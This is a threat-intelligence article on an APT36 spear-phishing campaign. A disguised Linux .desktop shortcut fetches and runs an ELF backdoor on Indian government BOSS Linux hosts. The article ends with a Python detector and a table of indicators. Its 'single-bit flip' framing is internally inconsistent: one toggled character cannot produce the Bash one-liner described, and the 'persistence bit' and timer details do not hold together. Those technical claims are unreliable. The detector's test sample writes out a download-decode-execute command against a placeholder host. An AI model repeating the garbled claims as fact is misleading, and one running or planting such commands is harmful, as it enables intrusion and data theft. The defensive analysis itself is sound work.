CYFIRMA researchers have uncovered a campaign they have codenamed "OneFlip", an operation that demonstrates how a single-bit modification inside a seemingly benign file can be enough to subvert a neural-network-driven security workflow and open a backdoor on the underlying host.
Transparent Tribe (APT36) is using the trick against India's Government networks that rely on the indigenous BOSS GNU/Linux distribution, while continuing to run a parallel Windows lure for mixed-fleet environments.
The group's lure, first seen on 1 August 2025, arrives by spear-phishing email as the archive "Meeting_Notice_Ltr_ID1543ops.pdf_.zip".
Inside sits a shortcut called "Meeting_Ltr_ID1543ops.pdf.desktop" whose icon, MIME type and filename convince most users and, crucially, many machine-learning-based mail gateways that it is only a PDF link.
APT36 weaponises Linux “.desktop” shortcuts
The novelty lies in the Exec= line. By toggling a single hexadecimal character, the attackers replace the legitimate viewer call with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it through xxd to rebuild the raw ELF, drops it in /tmp under a timestamped name, marks it executable and launches it under nohup.
Firefox is then opened on an innocuous Google Drive PDF to complete the illusion of normality.
Because the file is declared Type=Application and Terminal=false, no console appears, while X-GNOME-Autostart-enabled=true ensures the shortcut fires on every log-in, flipping a single persistence bit inside the user's session metadata.
Static inspection of the secondary ELF ("Meeting_Ltr_ID1543ops.pdf-.elf", MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped section names, oversized NOBITS regions and a hard-coded string for hxxp://modgovindia[.]area:4000.

Runtime analysis confirms that the implant registers a per-user systemd timer named system-update.service and copies itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.
Stealth persistence established
Socket traces show non-blocking DNS queries via 127.0.0.53 that resolve modgovindia[.]area to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and data exfiltration.
The implant has already been caught siphoning directory listings, local user databases and SSH keys, indicating the adversary is staging wider lateral movement.
The OneFlip moniker reflects the campaign's ability to defeat automated inspection pipelines that now rely heavily on deep-learning classifiers.
By embedding its malicious logic in the unstructured Exec string and altering only a single byte relative to a legitimate template, the shortcut retains a near-identical feature vector; the neural net continues to score it as benign, while human operators see only a PDF icon.
This underscores a broader weakness in AI-assisted filtering: models that are not retrained on Linux-specific threat artefacts are blind to subtle, syntax-level perturbations.
Defenders should harden BOSS hosts with noexec mounts on /tmp, block outbound access to newly registered domains, and deploy an EDR that inspects .desktop files for compound shell directives.
Mail systems should detonate Linux shortcuts in sandboxed VMs, because signature-less, single-bit polymorphism is now a proven bypass technique.
Finally, security teams running machine-learning detection stacks should expand their training sets to include Linux UI artefacts and test adversarial robustness against command-concatenation patterns.
CYFIRMA assesses that APT36 will continue enriching its backdoor until host-based models learn to spot these minimal flips; until then, the group retains a stealthy, dual-platform foothold inside critical Indian Government infrastructure.
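One way to implement the .desktop inspection recommended above, as an added example that is not code from the CYFIRMA report or any vendor product: it parses a shortcut with Python's configparser, flags download/decode/drop tokens and command concatenation in the Exec= line, the hidden-terminal combination and the autostart flag, and runs over two constructed samples. The lure sample is inert and modelled only on the description above; example.invalid and the /tmp/p path are placeholders, not the campaign's indicators.

```python
import re
from configparser import ConfigParser

# Tokens a PDF "shortcut" has no reason to carry in its Exec= line.
EXEC_TOKENS = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "decoder": re.compile(r"\b(xxd|base64)\b"),
    "tmp-drop": re.compile(r"/tmp/"),
    "stage": re.compile(r"\b(chmod|nohup)\b"),
    "shell-wrapper": re.compile(r"\b(ba)?sh\s+-c\b"),
}
CHAIN_OPS = re.compile(r"\|\||&&|\||;")  # command concatenation

def analyse_desktop(filename: str, text: str) -> list:
    """Parse a .desktop file and list why it looks like a disguised launcher."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case (Exec, Terminal, X-GNOME-...)
    cp.read_string(text)
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    findings = [f"exec:{k}" for k, pat in EXEC_TOKENS.items() if pat.search(exec_line)]
    ops = CHAIN_OPS.findall(exec_line)
    if ops:
        findings.append(f"exec:chain-operators={len(ops)}")
    # A launcher named like a document: "something.pdf.desktop"
    if re.search(r"\.(pdf|docx?|xlsx?)\.desktop$", filename, re.I):
        findings.append("name:double-extension")
    # A shell chain with no visible console is how the lure hides its work
    if ops and entry.get("Terminal", "false").lower() == "false":
        findings.append("stealth:shell-chain-without-terminal")
    if entry.get("X-GNOME-Autostart-enabled", "false").lower() == "true":
        findings.append("persist:autostart")
    return findings

# Constructed samples (not the campaign's files); the lure is inert (example.invalid).
BENIGN = """[Desktop Entry]
Type=Application
Name=Meeting Notice
Exec=xdg-open /home/user/Documents/notice.pdf
"""
LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Exec=bash -c "curl -s https://example.invalid/p.txt | xxd -r -p > /tmp/p; chmod +x /tmp/p; nohup /tmp/p &"
Terminal=false
X-GNOME-Autostart-enabled=true
"""

if __name__ == "__main__":
    for name, body in (("notice.desktop", BENIGN), ("Meeting_Ltr_ID1543ops.pdf.desktop", LURE)):
        print(name, analyse_desktop(name, body) or ["clean"])
```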
Indicators of Compromise
| S.No | Indicator | Type / Action |
|---|---|---|
| 1 | 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1 | SHA-256 / Block |
| 2 | 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 | SHA-256 / Block |
| 3 | e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b | SHA-256 / Block |
| 4 | securestore[.]cv | Domain / Block |
| 5 | modgovindia[.]area | Domain / Block |
| 6 | 45[.]141[.]58[.]199 | IP / Monitor |